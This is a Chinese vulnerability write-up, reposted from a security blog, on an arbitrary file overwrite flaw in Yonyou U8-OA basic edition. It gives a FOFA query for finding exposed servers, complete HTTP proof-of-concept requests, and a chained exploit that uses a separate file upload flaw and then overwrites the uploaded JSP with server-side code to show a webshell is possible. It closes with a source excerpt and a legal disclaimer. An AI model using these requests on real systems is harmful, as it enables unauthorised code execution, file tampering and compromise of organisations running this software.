文章来源:https://xz.aliyun.com/t/14776
用友U8-OA基础版存在任意文件覆盖写入漏洞
漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。
body="致远" && "/yyoa/" && icon_hash="23842899"
产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底部有版本信息
漏洞POC:
GET /yyoa/portal/style/controller/operaFileActionController.jsp?path={系统中存在的文件路径}&type=jsp&fileop=save&context=111 HTTP/1.1Host: hostPragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=8AF8525D562E345BD18FA00F6E28FFADConnection: close
验证截图:
用友U8-OA基础版
1、先使用之前存在的任意文件上传漏洞,上传一个jsp后缀文件到系统中,当然此处也可以直接使用系统中存在的jsp 文件直接覆盖写入,但存在破坏性。
POST /xxx/doUpload.jsp HTTP/1.1Host: xxx:xx80Content-Length: 298Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygKGvx2gFuemASlq2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10DConnection: close------WebKitFormBoundarygKGvx2gFuemASlq2Content-Disposition: form-data; name="myfile"; filename="test.jsp"Content-Type: application/octet-stream11111------WebKitFormBoundarygKGvx2gFuemASlq2--
上传文件,文件内容为:11111
上传后的路径为:
http://xxx/upload/1695830703194.jsp
2、验证文件覆盖写入漏洞:
GET /xxx/operaFileActionController.jsp?path=/xxx/upload/1695830703194.jsp&type=jsp&fileop=save&context=%3C%25out.print%28999%2A999%29%3Bnew+java.io.File%28application.getRealPath%28request.getServletPath%28%29%29%29.delete%28%29%3B%25%3E HTTP/1.1Host: xxx:xx81Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=8AF8525D562E345BD18FA00F6E28FFADConnection: close
此处写入的内容为:
<%out.print(999*999);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>访问一次后自动删除,证明可解析,以及可getshell。
源码下载地址:
在咸鱼购买到对应系统的安装包,点击安装后在对应安装目录生成源码。
源代码分析,源代码路径为:
/xxxx/operaFileActionController.jsp<% language="java"%><% session="true"%><% contentType="text/html;charset=GBK"%><% import="java.sql.SQLException"%><% import="java.util.*"%><% import="java.io.*"%><% import="code3.www.seeyon.com.apps.portal.style.tools.OperaFile"%><%response.setContentType("text/html;charset=gbk");String fileName = request.getParameter("path");String fileType = request.getParameter("type");String fileOp = request.getParameter("fileop");String cont = request.getParameter("context");String typeid = request.getParameter("typeid");# 通过get方式传参,获取参数值int sucess = 0;String allPath = "";allPath = fileName;OperaFile op = new OperaFile();File file = null;String path=this.getServletContext().getRealPath("/");try {String p = path + allPath;# 拼接完整路径,path为根路径: /yyoa/ allPath为前端输入的文件路径,用户可控。} else if(fileOp.equals("save")) {
if(fileType.equals("css")) {cont = java.net.URLDecoder.decode(cont, "GBK");}if(op.fileExists(p) == 1) {file = new File(p);sucess = op.writeFile(file, cont);if(sucess == 1) {out.print("文件保存成功!");} else {out.print("文件保存失败!");}} else {out.print("此文件不存在,请先上传文件!");}}
到了此处高危CNVD就到手了!!!
原文始发于微信公众号(李白你好):高危CNVD证书挖掘姿势 | 某OA文件上传漏洞getshell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论